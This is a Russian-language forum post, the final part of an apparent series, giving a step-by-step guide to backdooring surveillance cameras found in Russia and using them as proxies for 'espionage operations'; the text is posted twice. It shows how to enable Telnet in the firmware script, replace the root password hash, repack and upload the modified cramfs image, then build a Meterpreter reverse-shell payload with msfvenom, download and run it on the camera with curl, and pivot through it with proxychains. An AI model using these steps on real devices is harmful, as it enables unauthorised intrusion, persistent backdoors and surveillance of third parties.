Сетевой шпионаж – использование российских камер в качестве прокси-сервера. Часть 3

  • Автор темы Автор темы LeSh1y777
  • Дата начала Дата начала

LeSh1y777

Пользователь
Регистрация
25/9/25
Сообщения
5,682
Репутация
49
Лайки
152
Депозит
-8.95$
banner-1-1024x683.webp



Добро пожаловать обратно, кибервоины.

Надеюсь, вам пока нравится эта серия. Сегодня мы завершаем её заключительной частью, посвящённой модификации прошивки камеры. Это самый продвинутый и рискованный метод. Он требует времени и точности. Самая большая проблема — найти прошивку, подходящую для редактирования и компиляции без поломки устройства. Каждый производитель использует определённые форматы, поэтому, если вы нарушите структуру или файловую систему, камера не загрузится. Всегда действуйте осторожно.



1-camera-view-in-moscow-1-1024x576.webp



Случай 4: Модификации

Этот случай похож на предыдущий, но мы копнём глубже. Представьте, что у найденной вами камеры нет открытых портов, таких как SSH или Telnet, и ни один из них не настраивается в настройках. На первый взгляд, это тупик.



2-camera-settings-allow-firmware-upgrade-1.webp
Перевод: Обновление прошивки — Обновление прошивки
Обзор… Файл не выбран. ХОРОШО


Но затем вы обнаруживаете, что он позволяет обновлять прошивку. У большинства камер эта функция доступна в веб-панели управления. Вот и всё. Первый шаг — получить копию прошивки. Её можно найти в архивах сторонних прошивок или на официальном сайте производителя.

После загрузки прошивки распакуйте её. Внутри мы обнаружили файл скрипта run.sh. Открыв его, мы заметили кое-что интересное.



3-firmware-has-run.sh-file-1.webp



В скрипте была закомментирована команда запуска Telnet. Мы удалили комментарий, чтобы включить Telnet.



4-enabling-telnet-in-run.sh-file.webp



Это решает одну часть проблемы. Но мы не знаем пароль Telnet, хешированный в файле passwd . По умолчанию этот файл находится в каталоге /etc :



5-passwd-file.webp



Вместо того, чтобы взламывать существующий хеш пароля, мы генерируем свой собственный:

kali > openssl passwd -1 пароль



6-generating-a-new-hash-string.webp



Это создаст новую строку хеша. Замените существующий хеш в файле /etc/passwd на только что сгенерированный. Сохраните изменения.



7-updated-passwd-file.webp



Теперь нужно перепаковать всю структуру каталогов в новый файл прошивки. Создайте новый каталог и переместите в него всё:

kali > mkdir firmware

kali > mv и т.д. прошивка/


И так далее, пока не переместите все остальные каталоги.

Наша прошивка использовала cramfs (сжатую файловую систему ROM). Вам потребуется установить инструменты cramfs непосредственно из репозитория Ubuntu, так как они недоступны для Kali.

Вот ссылка, по которой вы можете ее найти:


Давайте скачаем его:

Кали > wget http://ftp.ubuntu.com/ubuntu/ubuntu/pool/universe/c/cramfs/cramfsprogs_1.1-6ubuntu1_amd64.deb



8-downloading-cramfs-tools.webp



Кали > sudo dpkg -i cramfsprogs_1.1-6ubuntu1_amd64.deb



9-installing-cramfs-tools.webp



После установки создайте новый образ прошивки: kali > mkcramfs firmware firmware-x.cramfs



10-compiling-firmware.webp



Переименуйте файл, чтобы он соответствовал имени оригинальной прошивки, чтобы избежать проблем с загрузкой. Мы назвали его «firmware» для большей наглядности. Вернитесь на панель управления камерой и загрузите изменённую прошивку.



11-uploading-firmware.webp
Перевод: Обновление прошивки — Обновление прошивки
Обзор… прошивка-x.cramfs OK


Подождите несколько минут, пока он прошьётся и перезагрузится. Чтобы проверить, подключен ли он снова:

кали > пинг <камера_ip>

Как только камера ответит, подключитесь через Telnet:

кали > telnet <camera_ip> 23



12-connecting-via-telnet.webp



Войдите в систему, используя root и созданный вами пароль. В случае успеха вы окажетесь внутри системы. В нашем случае на целевой машине уже был установлен nc , что очень помогло.



13-nc-available.webp



Выполнение полезной нагрузки

Определите архитектуру системы:

цель > uname -m

Создайте полезную нагрузку на Kali:

kali > msfvenom -p linux/<arch>/meterpreter/reverse_tcp LHOST=<kali_ip> LPORT=<kali_port> -f elf > shell.elf



14-generating-payload.webp



Разместите полезную нагрузку на вашем компьютере Kali:

kali > python3 -m http.server

Затем загрузите его на целевой объект:

цель > curl -O http://<kali_ip>:8000/shell.elf

цель > chmod +x shell.elf

цель > ./shell.elf


Откройте Metasploit на Kali, настройте multi/handler с теми же параметрами полезной нагрузки, и вы получите сеанс Meterpreter. После этого используйте proxychains с SOCKS-прокси для маршрутизации трафика через скомпрометированную камеру и доступа к сети за ней. Все эти шаги были рассмотрены в предыдущих частях.

Модификация прошивки камеры — самый продвинутый шаг в получении постоянного доступа. Это позволяет создать собственный бэкдор, даже если все порты закрыты. Этот метод даёт полный контроль, но и сопряжен с высоким риском. Небольшая ошибка — и камера сломается. Но если всё сделано правильно, это мощный инструмент для более глубокого проникновения. С этим заключительным этапом у вас теперь есть полное руководство по взлому, доступу к российским камерам и их использованию в качестве доверенных лиц в шпионских операциях. Удачи в вашей следующей охоте.
 
banner-1-1024x683.webp



Добро пожаловать обратно, кибервоины.

Надеюсь, вам пока нравится эта серия. Сегодня мы завершаем её заключительной частью, посвящённой модификации прошивки камеры. Это самый продвинутый и рискованный метод. Он требует времени и точности. Самая большая проблема — найти прошивку, подходящую для редактирования и компиляции без поломки устройства. Каждый производитель использует определённые форматы, поэтому, если вы нарушите структуру или файловую систему, камера не загрузится. Всегда действуйте осторожно.



1-camera-view-in-moscow-1-1024x576.webp



Случай 4: Модификации

Этот случай похож на предыдущий, но мы копнём глубже. Представьте, что у найденной вами камеры нет открытых портов, таких как SSH или Telnet, и ни один из них не настраивается в настройках. На первый взгляд, это тупик.



2-camera-settings-allow-firmware-upgrade-1.webp
Перевод: Обновление прошивки — Обновление прошивки
Обзор… Файл не выбран. ХОРОШО


Но затем вы обнаруживаете, что он позволяет обновлять прошивку. У большинства камер эта функция доступна в веб-панели управления. Вот и всё. Первый шаг — получить копию прошивки. Её можно найти в архивах сторонних прошивок или на официальном сайте производителя.

После загрузки прошивки распакуйте её. Внутри мы обнаружили файл скрипта run.sh. Открыв его, мы заметили кое-что интересное.



3-firmware-has-run.sh-file-1.webp



В скрипте была закомментирована команда запуска Telnet. Мы удалили комментарий, чтобы включить Telnet.



4-enabling-telnet-in-run.sh-file.webp



Это решает одну часть проблемы. Но мы не знаем пароль Telnet, хешированный в файле passwd . По умолчанию этот файл находится в каталоге /etc :



5-passwd-file.webp



Вместо того, чтобы взламывать существующий хеш пароля, мы генерируем свой собственный:

kali > openssl passwd -1 пароль



6-generating-a-new-hash-string.webp



Это создаст новую строку хеша. Замените существующий хеш в файле /etc/passwd на только что сгенерированный. Сохраните изменения.



7-updated-passwd-file.webp



Теперь нужно перепаковать всю структуру каталогов в новый файл прошивки. Создайте новый каталог и переместите в него всё:

kali > mkdir firmware

kali > mv и т.д. прошивка/


И так далее, пока не переместите все остальные каталоги.

Наша прошивка использовала cramfs (сжатую файловую систему ROM). Вам потребуется установить инструменты cramfs непосредственно из репозитория Ubuntu, так как они недоступны для Kali.

Вот ссылка, по которой вы можете ее найти:


Давайте скачаем его:

Кали > wget http://ftp.ubuntu.com/ubuntu/ubuntu/pool/universe/c/cramfs/cramfsprogs_1.1-6ubuntu1_amd64.deb



8-downloading-cramfs-tools.webp



Кали > sudo dpkg -i cramfsprogs_1.1-6ubuntu1_amd64.deb



9-installing-cramfs-tools.webp



После установки создайте новый образ прошивки: kali > mkcramfs firmware firmware-x.cramfs



10-compiling-firmware.webp



Переименуйте файл, чтобы он соответствовал имени оригинальной прошивки, чтобы избежать проблем с загрузкой. Мы назвали его «firmware» для большей наглядности. Вернитесь на панель управления камерой и загрузите изменённую прошивку.



11-uploading-firmware.webp
Перевод: Обновление прошивки — Обновление прошивки
Обзор… прошивка-x.cramfs OK


Подождите несколько минут, пока он прошьётся и перезагрузится. Чтобы проверить, подключен ли он снова:

кали > пинг <камера_ip>

Как только камера ответит, подключитесь через Telnet:

кали > telnet <camera_ip> 23



12-connecting-via-telnet.webp



Войдите в систему, используя root и созданный вами пароль. В случае успеха вы окажетесь внутри системы. В нашем случае на целевой машине уже был установлен nc , что очень помогло.



13-nc-available.webp



Выполнение полезной нагрузки

Определите архитектуру системы:

цель > uname -m

Создайте полезную нагрузку на Kali:

kali > msfvenom -p linux/<arch>/meterpreter/reverse_tcp LHOST=<kali_ip> LPORT=<kali_port> -f elf > shell.elf



14-generating-payload.webp



Разместите полезную нагрузку на вашем компьютере Kali:

kali > python3 -m http.server

Затем загрузите его на целевой объект:

цель > curl -O http://<kali_ip>:8000/shell.elf

цель > chmod +x shell.elf

цель > ./shell.elf


Откройте Metasploit на Kali, настройте multi/handler с теми же параметрами полезной нагрузки, и вы получите сеанс Meterpreter. После этого используйте proxychains с SOCKS-прокси для маршрутизации трафика через скомпрометированную камеру и доступа к сети за ней. Все эти шаги были рассмотрены в предыдущих частях.

Модификация прошивки камеры — самый продвинутый шаг в получении постоянного доступа. Это позволяет создать собственный бэкдор, даже если все порты закрыты. Этот метод даёт полный контроль, но и сопряжен с высоким риском. Небольшая ошибка — и камера сломается. Но если всё сделано правильно, это мощный инструмент для более глубокого проникновения. С этим заключительным этапом у вас теперь есть полное руководство по взлому, доступу к российским камерам и их использованию в качестве доверенных лиц в шпионских операциях. Удачи в вашей следующей охоте.
было интересно изучать
 
Назад
Сверху Снизу